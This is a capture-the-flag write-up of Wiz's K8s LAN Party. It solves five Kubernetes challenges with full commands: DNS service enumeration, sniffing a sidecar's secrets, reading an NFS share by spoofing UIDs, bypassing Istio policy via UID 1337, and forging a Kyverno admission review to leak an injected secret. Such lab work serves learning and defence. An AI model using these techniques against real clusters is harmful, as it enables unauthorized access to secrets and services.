K8s LAN Party Challenge
Table of Contents
Introduction
I recently had the chance to try the K8s LAN Party by Wiz, which is the latest version of their mini-CTFs before conferences. The last one was the EKS Cluster Games which was good fun, so I was excited to try this as well. Unfortunately, it came out whilst I was on holiday so didn’t have a chance to do it straight away but promptly did it on my return.
Unlike previous challenges which were typically done in a series, this one had 5 distinct challenges which could be attempted in any order. Each challenge followed a different theme.
Challenge 1 - Recon
The first challenge had the following description:
DNSing with the stars
You have compromised a Kubernetes pod, and your next objective is to compromise other internal services further.
As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have preloaded your machine with dnscan to ease this process for further challenges.
All the flags in the challenge follow the same format: wiz_k8s_lan_party{*}
Clearly a nice entry challenge to get us started, and gives us the flag format for the rest of the challenges. Looks like it has something to do with DNS. My immediate thought when it comes to this is wildcard DNS, which used to be a common occurrence in clusters allowing resolution of items such as any.any.svc.cluster.local
to get a list of all services.
Like last time, we have an interactive shell in the browser. So we can try that with host any.any.svc.cluster.local
and see what we get.
player@wiz-k8s-lan-party:~$ host any.any.svc.cluster.local
Host any.any.svc.cluster.local not found: 3(NXDOMAIN)
Nope, clearly no wildcard DNS. The description also mentioned a tool called dnscan
which I’m not familiar with. A quick look at its help suggests it takes a subnet as input. This suggests it could be enumerating PTR records for each IP in that subnet. We just need a subnet to scan. The immediate thought would be the service CIDR range, or the pod CIDR range. Let’s start with service.
We now need to guess at what the service CIDR range is, luckily we can get the service IP of the API server through environment variables. I usually just assume that’s a /16, so let’s see how that goes.
player@wiz-k8s-lan-party:~$ env | grep -i kube
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.100.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.100.0.1
KUBERNETES_SERVICE_HOST=10.100.0.1
KUBERNETES_PORT=tcp://10.100.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.1/16
34952 / 65536 [----------------------------------------------->__________________________________________] 53.33% 977 p/s
10.100.136.254 getflag-service.k8s-lan-party.svc.cluster.local.
65470 / 65536 [----------------------------------------------------------------------------------------->] 99.90% 978 p/s
10.100.136.254 -> getflag-service.k8s-lan-party.svc.cluster.local.
Nice, we found a service called getflag-service
. Let’s see if we can get the flag from it.
player@wiz-k8s-lan-party:~$ curl getflag-service.k8s-lan-party.svc.cluster.local.
wiz_k8s_lan_party{between-thousands-of-ips-you-found-your-northen-star}
Challenge 2 - Finding Neighbours
The next challenge had the following description:
Hello?
Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.
This seems to imply there is a sidecar container in the pod we are currently in. Sidecars are just extra containers in the same pod, and can share various namespaces as another container. The network namespace for example is shared between containers in a pod, and other namespaces such as PID can be shared if configured in the pod specification.
The reporting sensitive secrets
suggests the sidecar is making requests to an external service. So we can try to capture network traffic and see what we see.
player@wiz-k8s-lan-party:~$ tcpdump -i any -A -s0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
[..SNIP..]
.d...b..POST / HTTP/1.1
Host: reporting-service
User-Agent: curl/7.64.0
Accept: */*
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
wiz_k8s_lan_party{good-crime-comes-with-a-partner-in-a-sidecar}
[..SNIP..]
36 packets captured
36 packets received by filter
0 packets dropped by kernel
Quickly skimming the output, we find the flag in a POST request being sent to the reporting-service
.
Challenge 3 - Data Leakage
Making good progress, let’s move to the next one:
Exposed File Share
The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦.
Interesting, I can’t guess exactly what this is referring to purely from that. Let’s dig in a bit to the pod and see what’s going on.
player@wiz-k8s-lan-party:~$ mount
[..SNIP..]
fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.23.121,local_lock=none,addr=192.168.124.98)
[..SNIP..]
Of particular note, within the mount
output we see an NFS mount. This is a network file system, that has historically been susceptible to a variety of attacks. For example, access controls are typically determined by the client which can lead to fun attacks. In this case, we see that this is mounted to /efs
. Let’s have a look within.
player@wiz-k8s-lan-party:~$ ls -lpa /efs/
total 8
drwxr-xr-x 2 root root 6144 Mar 11 11:43 ./
drwxr-xr-x 1 player player 51 Mar 15 07:24 ../
---------- 1 daemon daemon 73 Mar 11 13:52 flag.txt
player@wiz-k8s-lan-party:~$ id daemon
uid=1(daemon) gid=1(daemon) groups=1(daemon)
OK, there is the flag, but we need to be daemon
to read it which is UID 1. We now need a way to access the NFS share with UID 1. Unfortunately, we aren’t root within the container, so we can’t simply jump to a different UID trivially. Luckily, there are tools for userspace NFS access, for example nfsshell
which I have used in the past. I know from previous challenges, it’s common for Wiz to put the relevant tooling required in the container to help out. So let’s see what may already be here. We can have a guess at a few by using bash autocomplete to guess at some tool names:
player@wiz-k8s-lan-party:~$ nfs
nfs-cat nfs-cp nfs-ls nfsconf nfsidmap nfsiostat nfsstat
nfs-ls
, nfs-cp
and nfs-cat
seems like they could be useful, let’s quickly Google it to see what it’s about. A quick Google takes us to a repository which looks to be the source, and contains some documentation on the library.
The tools looks to use NFS URIs of the form nfs://[<username>@]<server|ipv4|ipv6>[:<port>]/path[?arg=val[&arg=val]*]
. This seems simple enough.
player@wiz-k8s-lan-party:~$ nfs-ls nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/
Failed to mount nfs share : mount_cb: nfs_service failed
Maybe not, that doesn’t look right. Skimming the documentation a but further, a thing that pops out is it defaults to NFS 3, however looking at mount we need NFS 4. We can generate what we think the URI should be with the details from the mount command.
player@wiz-k8s-lan-party:~$ nfs-ls nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/?version=4
---------- 1 1 1 73 flag.txt
Excellent, so this tool seems to be working nicely. Let’s cat the file and move on.
player@wiz-k8s-lan-party:~$ nfs-cat nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/flag.txt?version=4
Failed to mount nfs share : nfs_mount_async failed. Bad export path. Absolute path does not start with '/'
Failed to open nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/flag.txt?version=4
Interesting, back to the documentation. In some of the examples under LD_PRELOAD
, I notice they have two slashes at the start of the path. Maybe this tool requires that.
player@wiz-k8s-lan-party:~$ nfs-cat nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4
Failed to open file /flag.txt: open call failed with "NFS4: (path /) failed with NFS4ERR_ACCESS(-13)"
Failed to open nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4
Awesome, moving forwards. That is the error message expected considering the file permissions. We want to aim for UID 1. Looking at the documentation, we can set UID as an extra parameter in the URI.
player@wiz-k8s-lan-party:~$ nfs-cat nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4\&uid=1
Failed to open file /flag.txt: open call failed with "NFS4: (path /) failed with NFS4ERR_ACCESS(-13)"
Failed to open nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=1
Interesting, same error. That’s unexpected.
At this point, I spent a lot of time trying to debug this, going down various rabbit holes such as NFS delegation, etc before moving on for now. I later come back after solving challenges 4 and 5. I carry on trying various things hoping to figure out what is going on. In one moment, in frustration I randomly decide to change UID to daemon
even though the documentation states it takes an integer. Which randomly worked, and I have no idea why. If you know why, let me know.
player@wiz-k8s-lan-party:~$ nfs-cat nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4\&uid=daemon
wiz_k8s_lan_party{old-school-network-file-shares-infiltrated-the-cloud!}
Testing it, it looked to have worked no matter what string was put as the UID or when the UID is 0. 0 makes sense… the default was the current UID according to the documentation, and I had forgot I wasn’t root. The letters, less so.
Challenge 4 - Bypassing Boundaries
Looking at challenge 4, it has the description:
The Beauty and The Ist
Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don't abuse this power; use it responsibly and with caution.
This one also has a policy:
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: istio-get-flag
namespace: k8s-lan-party
spec:
action: DENY
selector:
matchLabels:
app: "{flag-pod-name}"
rules:
- from:
- source:
namespaces: ["k8s-lan-party"]
to:
- operation:
methods: ["POST", "GET"]
This suggests there is an endpoint that we can request the flag from. However, the HTTP verbs to perform that request are blocked by an Istio policy. We probably need to bypass this policy to get the flag.
First things first, we need an endpoint. Whilst we know the policy, we don’t know the name of the service. However, we can use the same DNS enumeration technique as before to find the service.
root@wiz-k8s-lan-party:~# dnscan -subnet 10.100.0.1/16
[..SNIP..]
10.100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
root@wiz-k8s-lan-party:~# curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
RBAC: access denied
Name’s a bit on the nose, but we now have a target. Thinking on how to bypass the policy a few thoughts cross my mind. There could be a bypass for the Istio policy of the likes of modifying the HTTP request in a way to bypass the Istio policy. However, this is unlikely as if manners of that existed, they would likely get disclosed as part of responsible disclosure and patched as opposed to being seen in a CTF. Much more likely there is a something within Istio itself that we can setup or spoof to bypass the policy.
However, I do try a few of those techniques just in case. You never know. As expected, they didn’t work.
Googling around for known Istio bypasses, I get drawn to UID 1337. This is the UID used by the Istio proxy, and has an exception in iptables
rules. For example, -A ISTIO_OUTPUT -m owner --uid-owner 1337 -j RETURN
. This could mean that we can simply change our UID to 1337, and the request just works.
Looking at /etc/passwd
in the container, we do see istio
within there. So let’s su
to that user, and try the curl again.
root@wiz-k8s-lan-party:~# cat /etc/passwd | grep 1337
istio:x:1337:1337::/home/istio:/bin/sh
root@wiz-k8s-lan-party:~# su istio
$ curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local; echo
wiz_k8s_lan_party{only-leet-hex0rs-can-play-both-k8s-and-linux}
Excellent, that is one I need to keep in mind for the future.
Challenge 5 - Lateral Movement
The final challenge states:
Who will guard the guardians?
Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.
It also has its own policy:
apiVersion: kyverno.io/v1
kind: Policy
metadata:
name: apply-flag-to-env
namespace: sensitive-ns
spec:
rules:
- name: inject-env-vars
match:
resources:
kinds:
- Pod
mutate:
patchStrategicMerge:
spec:
containers:
- name: "*"
env:
- name: FLAG
value: "{flag}"
This suggests there is a Kyverno policy to inject the flag into pods created within the sensitive-ns
namespace. A quick check of our permissions in that namespace, suggest it’s the default:
player@wiz-k8s-lan-party:~$ kubectl -n sensitive-ns auth can-i --list
2024/03/18 18:42:39 Starlark failed to allocate 4GB address space: cannot allocate memory. Integer performance may suffer.
Warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]
Thus it’s unlikely the API server is the route to go, especially considering the nature of the other challenges. I then remember some thoughts I had on a client engagement a while back with regards to admission webhooks, of possible techniques to attempt to access/exfiltrate data through admission reviews. Which seems like it would work here. If we submit our own admission review to Kyverno for the creation of a “new” pod, its response would include a patch to inject the flag.
We now need the endpoint for Kyverno. Luckily, Kyverno keeps to relatively sane defaults where it’s most likely going to be kyverno-svc
in the kyverno
namespace.
player@wiz-k8s-lan-party:~$ host kyverno-svc.kyverno.svc.cluster.local
kyverno-svc.kyverno.svc.cluster.local has address 10.100.232.19
Excellent. Next we need is the path. I couldn’t remember the path off the top of my head, so I spun up a quick test cluster with Kyverno and applied the same policy to make sure a mutating policy was in place. I could then query the API server for mutatingwebhookconfigurations
and just pull the path from the clientConfig
$ kubectl get mutatingwebhookconfigurations kyverno-resource-mutating-webhook-cfg -o yaml
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
[..SNIP..]
name: kyverno-resource-mutating-webhook-cfg
[..SNIP..]
service:
name: kyverno-svc
namespace: kyverno
path: /mutate/fail
port: 443
Excellent, we now have the endpoint and path. We now need to generate an admission review request. This is a standard format for webhook admission controllers. I did try manually creating my own, but got frustrated and just Googled for a solution and found someone made a tool for it. I should have checked first xD
So this will create the JSON payload for a pod specification, let’s create a dummy pod specification, and then create an admission review for it.
$ cat pod.yml
apiVersion: v1
kind: Pod
metadata:
name: testing
namespace: sensitive-ns
spec:
containers:
- name: test
image: foo
env:
- name: FLAG
value: foo
$ kube-review create pod.yml
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "64f8eebc-dbc2-4e4d-9264-acf606306ee1",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "testing",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "31808dbc-108a-4722-adc3-75bfc50d8ef3"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "testing",
"namespace": "sensitive-ns",
"creationTimestamp": null
},
"spec": {
"containers": [
{
"name": "test",
"image": "foo",
"env": [
{
"name": "FLAG",
"value": "foo"
}
],
"resources": {}
}
]
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
Now we have the review, let’s submit it to Kyverno.
player@wiz-k8s-lan-party:~$ curl -k https://kyverno-svc.kyverno.svc.cluster.local/mutate/fail -X POST --data @review -H "Content-Type: application/json" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3085 100 1397 100 1688 51134 61786 --:--:-- --:--:-- --:--:-- 111k
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "64f8eebc-dbc2-4e4d-9264-acf606306ee1",
"kind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"resource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"requestKind": {
"group": "",
"version": "v1",
"kind": "Pod"
},
"requestResource": {
"group": "",
"version": "v1",
"resource": "pods"
},
"name": "testing",
"namespace": "sensitive-ns",
"operation": "CREATE",
"userInfo": {
"username": "kube-review",
"uid": "31808dbc-108a-4722-adc3-75bfc50d8ef3"
},
"object": {
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "testing",
"namespace": "sensitive-ns",
"creationTimestamp": null
},
"spec": {
"containers": [
{
"name": "test",
"image": "foo",
"env": [
{
"name": "FLAG",
"value": "foo"
}
],
"resources": {}
}
]
},
"status": {}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
},
"response": {
"uid": "64f8eebc-dbc2-4e4d-9264-acf606306ee1",
"allowed": true,
"patch": "W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d",
"patchType": "JSONPatch"
}
}
The patch
in the response
is the JSON patch that Kyverno has generated for this. Decoding it leads to our final flag.
player@wiz-k8s-lan-party:~$ base64 -d <<< W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d; echo
[{"op":"replace","path":"/spec/containers/0/env/0/value","value":"wiz_k8s_lan_party{you-are-k8s-net-master-with-great-power-to-mutate-your-way-to-victory}"}, {"path":"/metadata/annotations","op":"add","value":{"policies.kyverno.io/last-applied-patches":"inject-env-vars.apply-flag-to-env.kyverno.io: replaced /spec/containers/0/env/0/value\n"}}]
Conclusion
That was a fun set of challenges. I particularly enjoyed the variety of techniques required to solve them. I’m still slightly annoyed at the NFS command in challenge 3 and that randomly working with an invalid UID. These CTFs are starting to be a regular occurrence by Wiz, so I’m pretty sure we can see another one soon which I’m looking forward to. Last year I think their first was an AWS one for fwd:CloudSec which was also good fun. This year, fwd:CloudSec is in June so maybe that’s how long I have to wait for the next one.